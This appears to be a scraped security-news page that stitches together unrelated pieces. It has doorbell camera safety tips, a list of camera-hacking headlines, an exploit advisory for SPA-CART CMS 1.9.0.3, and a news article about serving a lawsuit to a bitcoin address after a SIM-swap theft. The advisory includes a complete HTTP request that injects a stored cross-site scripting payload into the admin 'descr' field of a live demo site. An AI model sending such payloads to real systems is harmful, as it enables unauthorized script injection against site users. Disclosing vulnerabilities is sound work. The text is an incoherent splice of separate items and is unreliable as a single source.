*   Only grant the doorbell app the minimum permissions necessary, like access to the camera and microphone.
*   Avoid apps from unknown developers and stick to official ones from the manufacturer.

****Keep Firmware Updated:****

*   Regularly update your doorbell’s firmware to ensure you have the latest security patches and bug fixes.
*   Enable automatic updates if available to stay protected.

****Monitor Activity:****

*   Be aware of who has access to your doorbell and monitor activity logs.
*   Look for any suspicious login attempts or unusual activity.

****Consider Privacy Settings:****

*   Adjust your doorbell’s privacy settings to control what areas are recorded and how long footage is stored.
*   Disable features you don’t need, like motion detection in public areas.

*   **FCC ID:** Look for a visible FCC ID on your doorbell. Devices without it might be illegal and lack proper security measures.
*   **Physical Security:** Make sure your doorbell is physically secure and can’t be easily tampered with.

1.  Vietnamese Group Hacks and Sells Bedroom Camera Footage
2.  Hacked Ring Cameras Used in Livestreaming Swatting Attacks
3.  3TB of clips from exposed home security cameras posted online
4.  Whitehat hacker: How to detect hidden cameras in Airbnb, hotels
5.  Wyze Cameras Glitch: 13K Users Saw Footage from Others’ Homes
6.  Israeli Rabbi Arrested for CCTV Hacking at Women’s Swimwear Store

Unsecured Video Doorbells Sold on Major Platforms: Millions at Risk of Hacking

SPA-CART CMS version 1.9.0.3 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: SPA-CART CMS - Stored XSS  
# Date: 2024-01-03  
# Exploit Author: Eren Sen  
# Vendor: SPA-Cart  
# Vendor Homepage: https://spa-cart.com/  
# Software Link: https://demo.spa-cart.com/  
# Version: [1.9.0.3]  
# CVE-ID: N/A  
# Tested on: Kali Linux / Windows 10  
# Vulnerabilities Discovered Date : 2024/01/03

# Vulnerability Type: Stored Cross Site Scripting (XSS) Vulnerability  
# Vulnerable Parameter Type: POST  
# Vulnerable Parameter: descr

# Proof of Concept: demo.spa-cart.com/product/258

# HTTP Request:

POST ////admin/products/258 HTTP/2  
Host: demo.spa-cart.com  
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxx; remember=xxxxxxxxxxxxxxxx  
Content-Length: 1906  
Sec-Ch-Ua:  
Accept: */*  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUsO8JxBs6LhB8LSl  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36  
Sec-Ch-Ua-Platform: ""  
Origin: https://demo.spa-cart.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://demo.spa-cart.com////admin/products/258  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="mode"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="sku"

SKU386

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="name"

asdf

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="cleanurl"

Wholesale-DIY-Jewelry-Faceted-70pcs-6-8mm-Red-AB-Rondelle-glass-Crystal-Beads  
------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="avail"

1000

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="price"

0.00

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="list_price"

2

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="weight"

0.00

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categoryid"

42

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categories[]"

8

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categories[]"

37

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="brandid"

4

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="status"

1

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="keywords"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl

Content-Disposition: form-data; name="descr"

<script>alert(1)</script>

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="title_tag"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="meta_keywords"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="meta_description"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl--

SPA-CART CMS 1.9.0.3 Cross Site Scripting

A California man who lost $100,000 in a 2021 SIM-swapping attack is suing the unknown holder of a cryptocurrency wallet that harbors his stolen funds. The case is thought to be the first in which a federal court has recognized… Read More »

A California man who lost $100,000 in a 2021 SIM-swapping attack is suing the unknown holder of a cryptocurrency wallet that harbors his stolen funds. The case is thought to be the first in which a federal court has recognized the use of information included in a bitcoin transaction — such as a link to a civil claim filed in federal court — as reasonably likely to provide notice of the lawsuit to the defendant. Experts say the development could make it easier for victims of crypto heists to recover stolen funds through the courts without having to wait years for law enforcement to take notice or help.

**Ryan Dellone**, a healthcare worker in Fresno, Calif., asserts that thieves stole his bitcoin on Dec. 14, 2021, by executing an unauthorized SIM-swap that involved an employee at his mobile phone provider who switched Dellone’s phone number over to a new device the attackers controlled.

Dellone says the crooks then used his phone number to break into his account at **Coinbase** and siphon roughly $100,000 worth of cryptocurrencies. Coinbase is also named as a defendant in the lawsuit, which alleges the company ignored multiple red flags, and that it should have detected and stopped the theft. Coinbase did not respond to requests for comment.

Working with experts who track the flow of funds stolen in cryptocurrency heists, Dellone’s lawyer **Ethan Mora** identified a bitcoin wallet that was the ultimate destination of his client’s stolen crypto. Mora says his client has since been made aware that the bitcoin address in question is embroiled in an ongoing federal investigation into a cryptocurrency theft ring.

Mora said it’s unclear if the bitcoin address that holds his client’s stolen money is being held by the government or by the anonymous hackers. Nevertheless, he is pursuing a novel legal strategy that allows his client to serve notice of the civil suit to that bitcoin address — and potentially win a default judgment to seize his client’s funds within — _without knowing the identity of his attackers or anything about the account holder._

In a civil lawsuit seeking monetary damages, a default judgment is usually entered on behalf of the plaintiff if the defendant fails to respond to the complaint within a specified time. Assuming that the cybercriminals who stole the money don’t dispute Dellone’s claim, experts say the money could be seized by cryptocurrency exchanges if the thieves ever tried to move it or spend it.

The U.S. courts have generally held that if you’re going to sue someone, you have to provide some kind of meaningful and timely communication about that lawsuit to the defendant in a way that is reasonably likely to provide them notice.

Not so long ago, you had track down your defendant and hire someone to physically serve them with a copy of the court papers. But legal experts say the courts have evolved their thinking in recent years about what constitutes meaningful service, and now allow notification via email.

On Dec. 14, 2023, a federal judge in the Eastern District of California granted Dellone permission to serve notice of his lawsuit directly to the suspected hackers’ bitcoin address — using a short message that was attached to roughly $100 worth of bitcoin Mora sent to the address.

Bitcoin transactions are public record, and each transaction can be sent along with an optional short message. The message uses what’s known as an “OP RETURN,” or an instruction of the Bitcoin scripting language that allows users to attach metadata to a transaction — and thus save it on the blockchain.

In the $100 bitcoin transaction Mora sent to the disputed bitcoin address, the OP RETURN message read: “OSERVICE – SUMMONS, COMPLAINT U.S. Dist. E.D. Cal. LINK: t.ly/123cv01408\_service,” which is a short link to a copy of the lawsuit hosted on Google Drive.

“The courts are adapting to the new style of service of process,” said **Mark Rasch**, a former federal prosecutor at the U.S. Department of Justice. “And that’s helpful and useful and necessary.”

Rasch said Mora’s strategy could force the government to divulge information about their case, or else explain to a judge why the plaintiff shouldn’t be able to recover their stolen funds without further delay. Rasch said it could be that Dellone’s stolen crypto was seized as part of a government asset forfeiture, but that either way there is no reason Uncle Sam should hold some cybercrime victims’ life savings indefinitely.

“The government doesn’t need the crypto as evidence, but in a forfeiture action the money goes to the government,” Rasch said. “But it was never the government’s money, and that doesn’t help the victim. The government should be providing information to the victims of cryptocurrency theft so that their attorneys can go get the money back themselves.”

**Nick Bax** is a security researcher who specializes in tracing the labyrinthine activity of criminals trying to use cryptocurrency exchanges and other financial instruments to launder the proceeds of cybercrime. Bax said Mora’ method could allow more victims to stake legitimate legal claims to their stolen funds.

“If you get a default judgment against a bitcoin address, for example, and then down the road that bitcoin gets sent to an exchange that complies with or abides by U.S. court orders, then it’s yours,” Bax said. “I’ve seen funds with a court order on them get frozen by the exchanges that decided it made sense to comply with orders from a U.S. federal court.”

Bax’s research was featured in a Sept. 2023 story here about how experts now believe it’s likely hackers are cracking open some of the password vaults stolen in the 2022 data breach at LastPass.

“I’ve talked to a lot victims who have had life-changing amounts of money being seized and would like that money back,” Bax said. “A big goal here is just making civil cases more efficient. Because then people can help themselves and they don’t need to rely solely on law enforcement with its limited resources. And that’s really the goal: To scale this and make it economically viable.”

While Dellone’s lawsuit may be the first time anyone has obtained approval from a federal judge to use bitcoin to notify another party of a civil action, the technique has been used in several recent unrelated cases involving other cryptocurrencies, including Ethereum and NFTs.

The law firm DLAPiper writes that in November 2022, the U.S. District Court for the Southern District of Florida “authorized service of a lawsuit seeking the recovery of stolen digital assets by way of a non-fungible token or NFT containing the text of the complaint and summons, as well as a hyperlink to a website created by the plaintiffs containing all pleadings and orders in the action.”

In approving Dellone’s request for service via bitcoin transaction, the judge overseeing the case cited a recent New York Superior Court ruling in a John Doe case brought by victims seeking to unmask the crooks behind a $1.3 million cyberheist.

In the New York case, the state trial court found it was acceptable for the plaintiffs to serve notice of the suit via cryptocurrency transactions because the defendants regularly used the Blockchain address to which the tokens were sent, and had recently done so. Also, the New York court found that because the account in question contained a significant sum of money, it was unlikely to be abandoned or forgotten.

“Thus the court inferred the defendants were likely to access the account in the future,” wrote **Judge Helena M. March-Kuchta**, for the Eastern District of California, summarizing the New York case. “Finally, the plaintiff had no alternative means of contacting these unknown defendants.”

Experts say regardless of the reason for a cryptocurrency theft or loss — whether it’s from a romance scam or a straight-up digital mugging — it’s important for victims to file an official report both with their local police and with the FBI’s **Internet Crime Complaint Center** (ic3.gov). The IC3 collects reports on cybercrime and sometimes bundles victim reports into cases for DOJ/FBI prosecutors and investigators.

The hard truth is that most victims will never see their stolen funds again. But sometimes federal investigators win minor victories and manage to seize or freeze crypto assets that are known to be associated with specific crimes and criminals. In those cases, the government will eventually make an effort to find, contact and in some cases remunerate known victims.

It might take many years for this process to unfold. But if and when they do make that effort, federal investigators are likely to focus their energies and attention responding to victims who staked a claim and can support it with documentation.

But have no illusions that any of this is likely to happen in a timeframe that is meaningful to victims in the short run. For example, in 2013 the U.S. government seized the assets of the virtual currency Liberty Reserve, massively disrupting a major vehicle for laundering the proceeds of cybercrime and other illegal activities.

When the government offered remuneration to Liberty Reserve account holders who wished to make a financial loss claim and supply supporting documentation, KrebsOnSecurity filed a claim. There wasn’t money much in my Liberty Reserve account; I simply wanted to know how long it would take for federal investigators to follow up on my claim, or indeed if they would at all.

In 2020 KrebsOnSecurity was contacted by an investigator with the U.S. Internal Revenue Service (IRS) who was seeking to discuss my claim. The investigator said they would have called sooner, but that it had taken that long for the IRS to gain legal access to the funds seized in the 2013 Liberty Reserve takedown.

Tag

#dell